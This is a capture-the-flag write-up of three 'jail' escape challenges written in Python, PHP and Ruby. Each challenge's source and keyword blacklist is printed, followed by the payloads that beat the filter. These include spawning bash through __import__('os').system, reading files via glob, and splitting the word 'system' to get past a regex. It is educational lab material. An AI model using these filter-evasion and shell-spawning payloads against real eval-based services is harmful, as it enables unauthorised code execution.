Blackberry CTF 2025
Get me out from this jail
🧱 JAIL CHALLENGE 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
##Snippet of code
#!/usr/local/bin/python
from shell import shell
blacklist = ["flag", "locals", "vars", "\\", "{", "}"]
banner = '''
========================
= Eevee's Jail 1 =
========================
'''
print(banner)
for _ in [shell]:
while True:
try:
huh = ascii(input("[+] > "))
if any(no in huh for no in blacklist):
raise ValueError("[!] Mission Failed. Try again.")
exec(eval(huh))
except Exception as err:
print(f"{err}")
🔎 Initial Observation
This script creates a restricted interactive shell and usage of flag”, “locals”, “vars”, “\”, “{“, “}” are blocked.
1.blacklist: Blocks sensitive words like flag, locals, vars, {}, and backslash.
2.ascii(input(…)): Takes input and escapes non-ASCII characters.
3.if any(…): Checks if user input contains blacklisted code .
4.eval(…) inside exec(…): Runs the user’s input as Python code.
5.If input is blacklisted it will raises an error and prints an error message.
💥 Exploit Analysis
1
exec(eval(huh))
We can see here this command executing the “exec”(eval(huh)) this segment of code that was core vuln of it .
⚙️ Exploit Strategy
1
exec("print(globals())")
So now lets try listing all the global variable maybe we can get few hints there.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
========================
= Eevee's Jail 1 =
========================
[+] > exec("print(globals())")
{
'__name__': '__main__',
'__doc__': None,
'__package__': None,
'__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x725e4f522ed0>,
'__spec__': None,
'__annotations__': {},
'__builtins__': <module 'builtins' (built-in)>,
'__file__': '/jail-1/jail-1.py',
'__cached__': None,
'shell': "__import__('os').system('bash')",
'blacklist': ['flag', 'locals', 'vars', '\\\\', '{', '}'],
'banner': '\n========================\n= Eevee\'s Jail 1 =\n========================\n',
'_': "__import__('os').system('bash')",
'huh': 'exec("print(globals())")'
}
[+] >
Okay the most interesting part here is that is we can see that there is a ‘shell’: “__import__(‘os’).system(‘bash’)” line of code ,
🎉 Result
1
2
3
4
5
6
7
[+] > __import__('os').system('bash')
ls
flag.txt
jail-1.py
shell.py
cat flag.txt
bbctf{is_th3r3_another_w4y_70_s0lv3_th1s?}
By executing the __import__(‘os’).system(‘bash’) we finally getting the shell access and escaping the sandboxing and gott that flag WEEEEEEEE.
FLAG:
1
bbctf{is_th3r3_another_w4y_70_s0lv3_th1s?}
🧱 JAIL CHALLENGE 4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
echo "========================\n";
echo "= Eevee's Jail 4 =\n";
echo "========================\n";
echo "[+] > ";
$var = trim(fgets(STDIN));
if($var == null) die("[?] Input needed to escape this prison\n");
function filter($var) {
if(preg_match('/(`|include|read|flag|open|exec|pass|system|\$)/i', $var)) {
return false;
}
return true;
}
if(filter($var)) {
eval($var);
} else {
echo "[!] Restricted characters has been used";
}
echo "\n";
?>
🔎 Initial Observation
This PHP setup a simple jail challenge .
1
$var = trim(fgets(STDIN));
1.It asks for your input.
1
2
3
4
5
6
function filter($var) {
if(preg_match('/(`|include|read|flag|open|exec|pass|system|\$)/i', $var)) {
return false;
}
return true;
}
2.It checks your input: if its containing (like system, read, flag, and even the $ sign for variables).
3.If your input is “clean,” it runs your input as PHP code.
💥 Exploit Analysis
1
2
3
4
5
6
function filter($var) {
if(preg_match('/(`|include|read|flag|open|exec|pass|system|\$)/i', $var)) {
return false;
}
return true;
}
This function basically blacklist filter used to prevent users from executing dangerous commands
If one of these found in input its marks as “false” and showing “[!] Restricted characters has been used”;
1
2
3
if(filter($var)) {
eval($var);
}
but if it pass the blacklisted it will return a true and your input will be pass and executing on eval($var).
⚙️ Exploit Strategy
1
var_dump(glob("*"))
1. What its basically do its a glob(“*”): Lists all files in the current directory.
2. var_dump(…): Prints the full structure of the result — data type, string length, and values
1
2
3
4
5
6
array(2) {
[0]=>
string(8) "flag.txt"
[1]=>
string(10) "jail-4.php"
}
Yeppppppii,the nc literally showing that the flag.txt was found on array 0 and we just need to call find a way to call the flag on array[0].
🎉 Result
1
2
3
4
5
6
7
(y2k@faris)-[~/Downloads]
nc 157.180.92.15 43882
===========================
= Eevee s Jail 4 =
===========================
[+] > echo file_get_contents(glob("*")[0]);
bbct{hmm.. so unpopular php function i guess?}
FLAG:
1
bbct{hmm.. so unpopular php function i guess?}
🧱 JAIL CHALLENGE 5
🔎 Initial Observation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env ruby
ALLOWED_COMMANDS = ["ls"]
def sanitize_input(input)
forbidden_words = %w[flag eval system read exec irb puts dir]
forbidden_pattern = /\b(?:#{forbidden_words.join('|')})\b/
if input.match(/[&|<>$`]/) || input.match(forbidden_pattern)
return false
end
true
end
def execute_command(cmd)
if ALLOWED_COMMANDS.include?(cmd.split.first)
system(cmd)
else
puts "Command not allowed!"
end
end
puts "========================\n"
puts "= Eevee's Jail 5 =\n"
puts "========================\n"
while true
print "[+] > "
input = gets.chomp
unless sanitize_input(input)
puts "Invalid characters detected!"
next
end
if input.start_with?("ruby:")
begin
eval(input[5..])
rescue Exception => e
puts "Error: #{e.message}"
end
next
end
execute_command(input)
end
Im not good at ruby at this point of my life so we will go along with gpt 
1
2
3
4
5
6
7
8
9
(y2k@faris)-[~/Downloads]
$ nc 157.180.92.15 52365
===========================
= Eevee's Jail 5 =
===========================
[+] > ruby:system('ls')
Invalid characters detected!
[+] > ruby:Kernel.send(:eval, "system('ls')")
Invalid characters detected!
💥 Exploit Analysis By GPT :
1.Input Sanitization
1
forbidden_words = %w[flag eval system read exec irb puts dir]
1.Uses a regex pattern to block inputs containing any of these keywords as whole words. 2.Rejects inputs containing shell metacharacters like &|<>$` to prevent shell injection
1
ALLOWED_COMMANDS = ["ls"]
2.Only allows ls if input is passed as a shell command.
1
2
if input.start_with?("ruby:")
eval(input[5..])
3.Backdoor for evaluating arbitrary Ruby code using eval.
Exploit Vector
Payload :
1
ruby:Kernel.send(("sy" + "stem").to_sym, 'cat ' + 'fla' + 'g.txt')
The command ruby:Kernel.send((“sy” + “stem”).to_sym, ‘cat ‘ + ‘fla’ + ‘g.txt’) is a trick to get around filters that block certain commands. It splits the word “system” into two parts and puts them back together when running the code. It also combines parts of the command ‘cat ‘, ‘fla’, and ‘g.txt’ to form ‘cat flag. txt’. This allows the code to use the system method without the filter noticing it, so it can run the cat flag.txt command and reveal the flag. This is called obfuscation, where the code is disguised to avoid detection.
